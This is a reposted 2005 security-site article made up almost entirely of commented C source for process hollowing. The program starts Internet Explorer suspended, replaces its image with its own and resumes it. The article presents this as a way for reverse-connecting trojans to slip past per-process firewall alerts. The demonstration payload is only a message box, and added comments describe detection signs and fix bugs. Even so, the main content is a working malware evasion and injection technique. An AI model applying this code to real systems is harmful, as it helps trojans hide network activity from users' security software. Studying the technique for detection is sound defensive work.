Bypassing firewall reverse-connection alerts by injecting into a trusted process - vulnerability warning - the black bar safety net

2005-11-27T00:00:00
ID MYHACK58:6220054888
Type myhack58
Reporter 佚名
Modified 2005-11-27T00:00:00

Description

/*

Author: Polymorphours

Date: 2005/1/10

Another way of injecting your own code into a puppet process: start a trusted executable suspended, replace its mapped image with your own, and resume it. Combined with a reverse-connecting ("rebound") trojan this evades host firewalls that alert on outbound connections per process, because the connection appears to originate from the puppet (here Internet Explorer).

*/

#include <windows.h>
#include <stdio.h>

// ntdll.lib (from the Windows 2000 DDK) supplies the ZwUnmapViewOfSection import.
#pragma comment(lib, "ntdll.lib")

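typedef long NTSTATUS;

/*
 * Native API resolved from ntdll.lib: unmaps a section view (here the puppet's
 * own executable image) inside another process. The callers below treat a
 * return value of 0 (STATUS_SUCCESS) as success and anything else as failure.
 */
NTSYSAPI NTSTATUS NTAPI ZwUnmapViewOfSection( HANDLE ProcessHandle, PVOID BaseAddress );

/*
 * What the injector learns about the suspended puppet process.
 * 32-bit only: image bases are carried as DWORDs and the thread context is
 * accessed through Eax/Ebx.
 */
typedef struct _ChildProcessInfo {
    DWORD dwBaseAddress;   /* ImageBaseAddress read from the child's PEB */
    DWORD dwReserve;       /* never referenced; kept only for layout compatibility */
} CHILDPROCESS, *PCHILDPROCESS;

/*
 * Builds the path of iexplore.exe into IePath. IePath must hold at least
 * MAX_PATH bytes; when dwBuffSize > 0 it is used as the copy bound instead.
 * (Declared with a pointer: the original "char IePath" could not receive the
 * char array every call site passes.)
 */
BOOL FindIePath( char *IePath, int dwBuffSize );

/* Hollow a suspended iexplore.exe with this executable's own image. */
BOOL InjectProcess(void);

/* Mapped size (SizeOfImage) of hModule, i.e. how many bytes to copy across. */
DWORD GetSelfImageSize( HMODULE hModule );

/* Start the puppet suspended and read its initial thread context and image base. */
BOOL CreateInjectProcess( PPROCESS_INFORMATION pi, PCONTEXT pThreadCxt, CHILDPROCESS *pChildProcess );

/* Path of the puppet executable; filled by InjectProcess(), read by CreateInjectProcess(). */
char szIePath[MAX_PATH];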

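/*
 * Entry point. One image plays two roles:
 *  - launched directly, InjectProcess() hollows a suspended iexplore.exe with a
 *    copy of this image and returns TRUE; the injector only prints a banner and
 *    exits;
 *  - when InjectProcess() discovers it is already running under the puppet's
 *    path it returns FALSE, and the else-branch is the "payload" executing
 *    inside the puppet — here nothing more than a MessageBox.
 *
 * Fix: the original banner used "\ r\n", an invalid escape sequence; it is now
 * a proper CRLF.
 */
int main(void)
{
    if ( InjectProcess() ) {
        printf( "This is my a test code,made by (Polymorphours)shadow3.\r\n" );
    } else {
        MessageBox( NULL, "process insertion completed", "Text", MB_OK );
    }
    return 0;
}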

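/*
 * Builds "<system drive>:\Program Files\Internet Explorer\iexplore.exe" into IePath.
 *
 * IePath      - destination; must hold at least MAX_PATH bytes.
 * dwBuffSize  - size of IePath when > 0. Existing callers pass NULL/0, which keeps
 *               the historical contract of a MAX_PATH-sized buffer.
 * Returns TRUE on success, FALSE if IePath is NULL, GetSystemDirectory fails or
 * returns something that is not "X:\...", or the result would not fit.
 *
 * Fixes over the original: the parameter is a pointer (a lone "char" could not
 * receive the array callers pass), the missing ';' after the truncation, the
 * garbled path literal, and the copy is now bounded and failures are reported
 * instead of always returning TRUE.
 *
 * Caveat (review): the location is guessed from the system drive only. On 64-bit,
 * localized, or relocated installations the real path differs; querying the
 * ProgramFiles environment variable or the shell folder APIs would be more
 * robust. Left as a path guess to preserve the original behaviour.
 */
BOOL FindIePath( char *IePath, int dwBuffSize )
{
    static const char szIeRelPath[] = "\\Program Files\\Internet Explorer\\iexplore.exe";
    char szSystemDir[MAX_PATH];
    UINT uLen;
    int nLimit;

    if ( IePath == NULL ) {
        return FALSE;
    }

    uLen = GetSystemDirectory( szSystemDir, MAX_PATH );
    if ( uLen == 0 || uLen >= MAX_PATH ) {
        return FALSE;           /* API failure, or the directory name was truncated */
    }

    /* Keep only the drive specifier ("C:") and append the fixed relative path. */
    if ( uLen < 2 || szSystemDir[1] != ':' ) {
        return FALSE;           /* e.g. a UNC system directory; no drive to build on */
    }
    szSystemDir[2] = '\0';
    lstrcat( szSystemDir, szIeRelPath );   /* 2 + sizeof(szIeRelPath) is far below MAX_PATH */

    /* A non-positive dwBuffSize means "the buffer is MAX_PATH bytes" (see header). */
    nLimit = ( dwBuffSize > 0 ) ? dwBuffSize : MAX_PATH;
    if ( lstrlen( szSystemDir ) >= nLimit ) {
        return FALSE;           /* would not fit including the terminator */
    }

    lstrcpy( IePath, szSystemDir );
    return TRUE;
}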

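/*
 * Process hollowing ("RunPE") of iexplore.exe with this executable's own image.
 *
 * Sequence: start the puppet suspended, unmap its original image with
 * ZwUnmapViewOfSection, allocate RWX memory at this image's own load address in
 * the puppet, copy this image over verbatim, point the puppet's PEB
 * ImageBaseAddress (offset 8 in the 32-bit PEB, as this code assumes) at the
 * copy, set the initial thread's Eax to the copied entry point and resume it.
 *
 * Returns:
 *  FALSE - this process is itself the puppet copy (its path equals the iexplore
 *          path), or a precondition failed before any child was created. main()
 *          relies on FALSE meaning "run the payload".
 *  TRUE  - this process acted as the injector. As in the original, failures of
 *          an individual injection step are reported on stdout and the child is
 *          terminated, but the return value stays TRUE so main() does not
 *          mistake the injector for the payload.
 *
 * Fixes over the original: ZwUnmapViewOfSection failure and every other
 * post-creation failure now terminates the suspended child (it used to be left
 * alive); hProcess/hThread are closed on every path (they leaked); the PEB write
 * is checked; the entry point is always computed from the address actually
 * allocated (the old first branch used the header ImageBase, which is wrong if
 * this image was relocated); "MEM_RESERVE │ MEM_COMMIT" used a non-ASCII bar,
 * "#ifdef" lacked its '#', and DWORDs were printed with %d.
 *
 * Because the image is copied without applying relocations, the copy must land
 * at this module's own address; VirtualAllocEx is asked for exactly that.
 *
 * Detection note: CreateProcess(CREATE_SUSPENDED) -> ZwUnmapViewOfSection ->
 * VirtualAllocEx(PAGE_EXECUTE_READWRITE) -> WriteProcessMemory -> SetThreadContext
 * -> ResumeThread is the textbook hollowing sequence, and afterwards the puppet's
 * PEB ImageBaseAddress no longer matches its on-disk image.
 *
 * 32-bit only (Eax/Ebx, DWORD-sized addresses).
 */
BOOL InjectProcess(void)
{
    char szModulePath[MAX_PATH];
    DWORD dwImageSize = 0;
    PROCESS_INFORMATION pi;
    CONTEXT ThreadCxt;
    DWORD *PPEB;
    DWORD dwWrite = 0;
    CHILDPROCESS stChildProcess;
    LPVOID lpVirtual = NULL;
    PIMAGE_DOS_HEADER pDosheader = NULL;
    PIMAGE_NT_HEADERS pVirPeHead = NULL;
    HMODULE hModule = NULL;
    BOOL bInjected = FALSE;

    ZeroMemory( szModulePath, MAX_PATH );
    ZeroMemory( szIePath, MAX_PATH );
    ZeroMemory( &pi, sizeof(pi) );
    ZeroMemory( &ThreadCxt, sizeof(ThreadCxt) );
    ZeroMemory( &stChildProcess, sizeof(stChildProcess) );

    /* Full path of the running image and of the intended puppet. */
    if ( GetModuleFileName( NULL, szModulePath, MAX_PATH ) == 0 ) {
        return FALSE;
    }
    if ( !FindIePath( szIePath, MAX_PATH ) ) {
        return FALSE;
    }

    /* Already running under the puppet's path: we are the injected copy. */
    if ( lstrcmpiA( szIePath, szModulePath ) == 0 ) {
        return FALSE;
    }

    hModule = GetModuleHandle( NULL );
    if ( hModule == NULL ) {
        return FALSE;
    }

    /* Locate this image's PE header for the entry point RVA. */
    pDosheader = (PIMAGE_DOS_HEADER)hModule;
    if ( pDosheader->e_magic != IMAGE_DOS_SIGNATURE ) {
        return FALSE;
    }
    pVirPeHead = (PIMAGE_NT_HEADERS)((DWORD)hModule + pDosheader->e_lfanew);
    if ( pVirPeHead->Signature != IMAGE_NT_SIGNATURE ) {
        return FALSE;
    }

    dwImageSize = GetSelfImageSize( hModule );
    if ( dwImageSize == 0 ) {
        return FALSE;
    }

    /* Start the puppet suspended; IE is chosen because the firewall trusts it. */
    if ( !CreateInjectProcess( &pi, &ThreadCxt, &stChildProcess ) ) {
        return TRUE;            /* injector role, but nothing to clean up */
    }
    printf( "CHILD PID: [%lu]\r\n", (unsigned long)pi.dwProcessId );

    /* Unmap the puppet's own executable image. */
    if ( ZwUnmapViewOfSection( pi.hProcess, (LPVOID)stChildProcess.dwBaseAddress ) != 0 ) {
        printf( "ZwUnmapViewOfSection() failed.\r\n" );
        goto cleanup;
    }

    /* Re-allocate at this image's own base: no relocation pass is applied. */
    lpVirtual = VirtualAllocEx( pi.hProcess, (LPVOID)hModule, dwImageSize,
                                MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE );
    if ( lpVirtual == NULL ) {
        printf( "VirtualMemory Failed,code:%lu\r\n", (unsigned long)GetLastError() );
        goto cleanup;
    }
    printf( "Unmapped and Allocated Mem Success.\r\n" );

    /* Ebx of the initial thread points at the PEB; PPEB[2] is ImageBaseAddress. */
    PPEB = (DWORD *)ThreadCxt.Ebx;
    if ( !WriteProcessMemory( pi.hProcess, &PPEB[2], &lpVirtual, sizeof(DWORD), &dwWrite )
         || dwWrite != sizeof(DWORD) ) {
        printf( "PEB ImageBase write Failed,code:%lu\r\n", (unsigned long)GetLastError() );
        goto cleanup;
    }

    /* Copy this image, as currently mapped, into the puppet. */
    if ( !WriteProcessMemory( pi.hProcess, lpVirtual, (LPCVOID)hModule, dwImageSize, &dwWrite )
         || dwWrite != dwImageSize ) {
        printf( "WirteMemory Failed,code:%lu\r\n", (unsigned long)GetLastError() );
        goto cleanup;
    }
    printf( "image inject into the process a success.\r\n" );

    /*
     * On x86 the suspended initial thread resumes at the loader stub with Eax
     * holding the entry point; redirect it into the copied image. Always use
     * the allocated address so the result is right even if lpVirtual differs
     * from the header's ImageBase.
     */
    ThreadCxt.ContextFlags = CONTEXT_FULL;
    ThreadCxt.Eax = (DWORD)lpVirtual + pVirPeHead->OptionalHeader.AddressOfEntryPoint;

#ifdef DEBUG
    printf( "EAX = [0x%08lx]\r\n", (unsigned long)ThreadCxt.Eax );
    printf( "EBX = [0x%08lx]\r\n", (unsigned long)ThreadCxt.Ebx );
    printf( "ECX = [0x%08lx]\r\n", (unsigned long)ThreadCxt.Ecx );
    printf( "EDX = [0x%08lx]\r\n", (unsigned long)ThreadCxt.Edx );
    printf( "EIP = [0x%08lx]\r\n", (unsigned long)ThreadCxt.Eip );
#endif

    if ( !SetThreadContext( pi.hThread, &ThreadCxt ) ) {
        printf( "SetThreadContext Failed,code:%lu\r\n", (unsigned long)GetLastError() );
        goto cleanup;
    }
    if ( ResumeThread( pi.hThread ) == (DWORD)-1 ) {
        printf( "ResumeThread Failed,code:%lu\r\n", (unsigned long)GetLastError() );
        goto cleanup;
    }
    bInjected = TRUE;

cleanup:
    /* A half-hollowed, still-suspended child must not be left behind. */
    if ( !bInjected ) {
        TerminateProcess( pi.hProcess, 0 );
    }
    CloseHandle( pi.hThread );
    CloseHandle( pi.hProcess );

    return TRUE;
}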

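/*
 * Returns the mapped size (SizeOfImage) of hModule: the number of bytes
 * InjectProcess() copies into the puppet.
 *
 * The original used inline assembly to walk the PEB loader list
 * (fs:[0x30] -> Ldr -> InLoadOrderModuleList.Flink -> +0x20 SizeOfImage),
 * which ignored hModule and only ever described the main executable. The
 * loader fills that list entry from the module's own PE header, so the value
 * is read from OptionalHeader.SizeOfImage here instead: no assembly, no
 * undocumented offsets, and it works for any module handle.
 *
 * Returns 0 when hModule is NULL or does not carry valid DOS/NT signatures.
 */
DWORD GetSelfImageSize( HMODULE hModule )
{
    PIMAGE_DOS_HEADER pDos;
    PIMAGE_NT_HEADERS pNt;

    if ( hModule == NULL ) {
        return 0;
    }

    pDos = (PIMAGE_DOS_HEADER)hModule;
    if ( pDos->e_magic != IMAGE_DOS_SIGNATURE ) {
        return 0;
    }

    pNt = (PIMAGE_NT_HEADERS)((BYTE *)hModule + pDos->e_lfanew);
    if ( pNt->Signature != IMAGE_NT_SIGNATURE ) {
        return 0;
    }

    return pNt->OptionalHeader.SizeOfImage;
}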

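/*
 * Starts the puppet (szIePath) suspended and captures what the injector needs.
 *
 * pi            - receives the child's process/thread handles and ids.
 * pThreadCxt    - receives the initial thread's CONTEXT_FULL context; on x86
 *                 Ebx holds the PEB address at this point.
 * pChildProcess - dwBaseAddress receives the child's PEB ImageBaseAddress
 *                 (PPEB[2]); dwReserve is zeroed and otherwise unused.
 *
 * Returns TRUE with a live, suspended child and open handles that the caller
 * owns. Returns FALSE with no child left running: if CreateProcess succeeds
 * but the context or PEB read fails, the child is terminated and its handles
 * closed before returning (the original returned TRUE with garbage in these
 * cases and never checked either call).
 *
 * Security fix: the path is passed as lpApplicationName rather than as an
 * unquoted command line. With lpApplicationName NULL, CreateProcess resolves
 * an unquoted "C:\Program Files\..." by trying "C:\Program.exe" first, so a
 * planted binary at that location would be launched instead of iexplore.exe.
 *
 * si.cb is now set, as CreateProcess documents.
 */
BOOL CreateInjectProcess( PPROCESS_INFORMATION pi, PCONTEXT pThreadCxt, CHILDPROCESS *pChildProcess )
{
    STARTUPINFO si;
    DWORD *PPEB;
    DWORD dwRead = 0;

    if ( pi == NULL || pThreadCxt == NULL || pChildProcess == NULL ) {
        return FALSE;
    }

    ZeroMemory( &si, sizeof(si) );
    si.cb = sizeof(si);
    ZeroMemory( pi, sizeof(*pi) );
    pChildProcess->dwBaseAddress = 0;
    pChildProcess->dwReserve = 0;

    /* Suspended so that its image can be swapped before any of its code runs. */
    if ( !CreateProcess( szIePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED,
                         NULL, NULL, &si, pi ) ) {
        return FALSE;
    }

    pThreadCxt->ContextFlags = CONTEXT_FULL;
    if ( !GetThreadContext( pi->hThread, pThreadCxt ) ) {
        goto fail;
    }

    /* Ebx -> PEB; PPEB[2] is the image base the loader recorded for the child. */
    PPEB = (DWORD *)pThreadCxt->Ebx;
    if ( !ReadProcessMemory( pi->hProcess, &PPEB[2], &pChildProcess->dwBaseAddress,
                             sizeof(DWORD), &dwRead )
         || dwRead != sizeof(DWORD) || pChildProcess->dwBaseAddress == 0 ) {
        goto fail;
    }

    return TRUE;

fail:
    /* Do not leave a suspended, half-inspected child around. */
    TerminateProcess( pi->hProcess, 0 );
    CloseHandle( pi->hThread );
    CloseHandle( pi->hProcess );
    ZeroMemory( pi, sizeof(*pi) );
    return FALSE;
}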

WSS (Whitecell Security Systems) is a non-profit civil technical organization committed to research on a wide range of system security technologies. It adheres to the traditional hacker spirit and pursues technical refinement and purity. WSS home page: http://www.whitecell.org/ WSS forum: http://www.whitecell.org/forums/